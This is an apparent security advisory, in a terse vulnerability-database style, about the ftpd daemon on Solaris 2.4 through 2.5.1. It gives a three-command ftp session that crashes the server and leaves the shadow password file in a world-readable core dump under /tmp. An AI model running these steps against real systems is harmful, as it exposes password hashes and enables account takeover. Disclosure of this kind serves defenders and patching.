COMMAND

    ftpd

SYSTEMS AFFECTED

    Solaris 2.4, Solaris 2.5, Solaris 2.5.1

PROBLEM

    logon via ftp with your regular user/password,

    ftp> cd /tmp
    ftp> user root wrongpasswd
    ftp> quote pasv

    Shadow  password  file  in  world  readable  core dump under /tmp.
    Under 5.4, the  core file is  rw-rw-rw and it  follows symlinks as
    root.